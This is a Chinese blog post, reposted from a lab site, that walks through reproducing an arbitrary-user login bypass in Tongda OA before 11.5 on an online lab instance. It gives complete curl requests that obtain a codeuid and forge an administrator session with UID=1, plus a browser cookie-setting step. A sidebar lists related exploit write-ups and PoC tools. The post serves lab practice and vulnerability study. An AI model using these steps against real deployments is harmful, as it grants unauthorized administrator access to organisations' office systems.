通达OA 11.5 以下版本 前台任意伪造用户登录登录绕过漏洞在线实验

最新推荐文章于 2024-06-26 16:21:19 发布
最新推荐文章于 2024-06-26 16:21:19 发布
阅读量2.7k 收藏 3
点赞数
分类专栏: 安全 文章标签: php 安全 通达OA 漏洞利用 逻辑漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ambulong/article/details/106309353
版权

转载自:【通达OA < 11.5 前台任意伪造用户登录登录绕过漏洞利用】https://store.vsplate.com/cn/post/518/

实验地址:https://www.vsplate.com/?github=%2Fbbvuln%2Ftdoa%2Ftree%2Fmaster%2F11.3%2Fdc&autogo=1

2020年04月17日, 通达OA官方在更新了一个v11版本安全补丁, 其中修复了一个任意用户伪造登录漏洞。未经授权的攻击者可以通过构造进行任意用户登录(包括admin),登录之后可进一步上传恶意文件控制网站服务器。通达OA是通达信科打造的协同办公平台,涵盖了工作流程、电子邮件、即时通讯、公告通知、新闻、日程安排、工作日志、知识管理,等近300个功能模块,国内用户众多。

1.访问 /general/login_code.php 获取 codeuid

curl -v http://***.vsgo.cloud/general/login_code.php

 

2.用 codeuid 请求 /logincheck_code.php,获取cookie

curl -v -d 'CODEUID=2AF415ED-E5A7-109A-4020-31B9D06ADD3A&UID=1' http://***.vsgo.cloud/logincheck_code.php

 

  1. 浏览器中打开 http://***.vsgo.cloud/general/ ,并在浏览器控制台上执行:
document.cookie="PHPSESSID=67b0bacb8dd8e730c8b0f81303b1513a;"

 

  1. 刷新页面,成功登录后台
Ambulong
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现-通达OA通达OA前台任意用户登录漏洞
xiaokp7的博客
06-18 2623
通达OA(Office Anywhere网络智能办公系统)是中国通达公司的一套协同办公自动化软件。通达OA < 11.5.200417存在一个认证绕过漏洞,利用该漏洞可以实现任意用户登录。攻击者可以通过构造恶意攻击代码,成功登录系统管理员账户,继而在系统后台上传恶意文件控制网站服务器。
通达OA 漏洞复现之第一篇v11.x-v11.5任意用户登录
千寻的博客
04-22 1852
文章目录漏洞简介漏洞原理影响范围环境搭建第一步 一路下一步安装第二步 设置端口第三步 本地访问漏洞复现方式一:抓包获取cookie信息第一步 访问/general/login_code.php第二步 提交数据到 /logincheck_code.php,获得Set-Cookie信息。第三步 验证登录/general/index.php方式二 poc执行第一步 使用poc获取管理员的Cookie信息第二步 使用Cookie访问系统修复建议摘抄 漏洞简介 通达OA是一套办公系统。 2020年04月17日, 通
复现通达OA前台任意用户登录漏洞
qax
04-27 2339
因为看到最近各个博客论坛都在复现这个通达OA漏洞,正好那天同事给我发了一个poc,正好试一下
漏洞概念_通达OA前台任意用户登录漏洞_详细漏洞知识点
最新发布
程序员六七的博客
06-26 561
本文由东塔网络安全学院学员---张同学 投稿。1 漏洞描述通达OA是一套使用比较广泛的办公系统。该漏洞因为使用uid作为身份标识,攻击者通过构造恶意请求
通达oa php漏洞,通达OA前台任意用户登录漏洞
weixin_42407606的博客
03-10 2705
本文由东塔网络安全学院学员---张同学 投稿。1 漏洞描述通达OA是一套使用比较广泛的办公系统。该漏洞因为使用uid作为身份标识,攻击者通过构造恶意请求,可以直接绕过登录验证逻辑,伪装为系统管理员身份登录OA系统。通达OA官方于2020年4月17日发布安全更新。2 影响版本通达OA < 11.5.200417版本通达OA 2017版本3 漏洞原理本次复现为2017版本,则重点分析该版本,但原...
某企业通达OA任意登录漏洞复现
热门推荐
FODKING的博客
11-19 1万+
通达oa任意登录详解
漏洞复现-——通达OA任意用户登陆漏洞
dust_hk的博客
04-25 5188
0x01 环境准备 XXXXXXX自己下个源码搭了个环境 影响范围: 通达OA 2017、<11.5版本 0x02 攻击 此漏洞复现需要三个步骤 (1)访问/general/login_code.php通过二维码获取codeid (2)访问/logincheck_code.php传递codeid并将uid设置为1(admin默认为1),获取session (3)利用获取到的sessio...
漏洞复现】通达OA任意用户登录
weixin_43486390的博客
03-16 1592
这位大佬有手工操作复现: https://www.cnblogs.com/bink1/p/13328579.html 0x01 简介 在 logincheck_code.php 文件,变量 UID 为攻击者可控,攻击者可改变 UID 参数,从而控制该 SQL 语句返回 USER 表中指定 uid参数的用户信息,便可通过伪造参数来达到登录任意用户的目的。该漏洞可获取任意用户session,包括系统管理员 0x02 影响范围 (1)通达OA2017 (2)通达 11.X<11.5版本 0x03 漏洞复现
通达OA前台任意用户伪造登录漏洞复现
m0_48520508的博客
07-14 1749
** 0x01简介 ** 北京通达信科科技有限公司是一支以管理软件研发、实施、服务与咨询为主营业务的高科技企业,隶属于世界500强企业中国兵器工业集团公司。 2019最值得购买的OA系统排名 通达OA采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。 ** 0x02漏洞介绍 ** 此次安全更新修复的高危漏洞任意用户伪造
通达OA前台任意用户登录漏洞复现
玄道的网安博客
11-27 2122
漏洞概述 通达OA是一套国内常用的办公系统,在V11.X<V11.5和通达OA 2017版本中存在任意用户登录漏洞。攻击者在远程且授权的情况下,通过此漏洞可以以任意用户身份登录到系统(包括系统管理员)。 影响版本 通达OA2017、V11.X<V11.5 环境搭建 下载安装 通达OA2017 v10.13.18 crack.zip 链接:https://pan.baidu.com/s/1ARWA5uB-T5eVBjEev3dChQ 提取码:1234 一键默认安装
通达OA前台任意用户登录漏洞.md
09-07
通达OA漏洞合集
最新通达漏洞版本利用poc.rar
03-31
最新通达漏洞版本利用poc
通达OA header身份认证绕过漏洞利用工具
12-25
通达OA header身份认证绕过漏洞利用脚本,可以检测漏洞是否存在并生成可用的cookie
通达OA v11.5 swfupload_new.php SQL注入漏洞.md
09-07
通达OA漏洞合集
通达OA——前台任意用户伪造登录
xunhuanmao的博客
10-08 4293
通达OA是一套使用比较广泛的办公系统,文中所涉及到的利用方式仅供学习使用,切勿用于违法行为。
github工具之OA综合利用python
千寻的博客
12-29 3036
oa工具
通达OA 前台任意用户登录漏洞复现(更新手工获取cookie过程)
thelostworld
05-12 3334
新增内容1:范围今天不是炒冷饭:主要是昨天有个兄弟看了文章后问了一下怎么手动获取cookie,相互交流了一下,觉得还是有必要发一下,这个手工获取cookie的流程。一、漏洞描述通达OA是一套办公系统。通达OA官方于4月17日发布安全更新。经分析,在该次安全更新中修复了包括任意用户登录在内的高危漏洞。攻击者通过构造恶意请求,可以直接绕过登录验证逻辑,伪装为系统管理员身份登录OA系统。二、影响版本通达OA2017、V11.X<V11.5环境搭建:自行镜像环境搭建(后台回复“tongda”获取环境和POC)
通达OA前台任意用户登录漏洞
weixin_50464560的博客
03-16 2310
1 漏洞描述通达OA是一套使用比较广泛的办公系统。该漏洞因为使用uid作为身份标识,攻击者通过构造恶意请求,可以直接绕过登录验证逻辑,伪装为系统管理员身份登录OA系统。通达OA官方于2020年4月17日发布安全更新。2 影响版本通达OA < 11.5.200417版本通达OA 2017版本3 漏洞原理本次复现为2017版本,则重点分析该版本,但原理都是基本相同的,只不过文件路径不同而已。根据POC的代码分析如下,该漏洞涉及的文件包含以下四个:/ispirit/login_code.php/genera
通达前台任意用户session伪造+后台getshell
m_ing
08-27 1271
前言:通达OA是一套办公系统。2020年04月17日, 通达OA官方在更新了一个v11版本安全补丁, 其中修复了一个任意用户伪造登录漏洞。 该漏洞类型为任意用户伪造授权的远程攻击者可以通过精心构造的请求包进行任意用户伪造登录,包括admin 漏洞影响版本通达OA < 11.5.200417 版本 准备条件: m_ing是此次利用的poc,目标的url直接写在url.txt中,vuln.txt是输出结果 运行脚本需要python3环境,python m_ing.py时会出现报错需要安装相应的
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值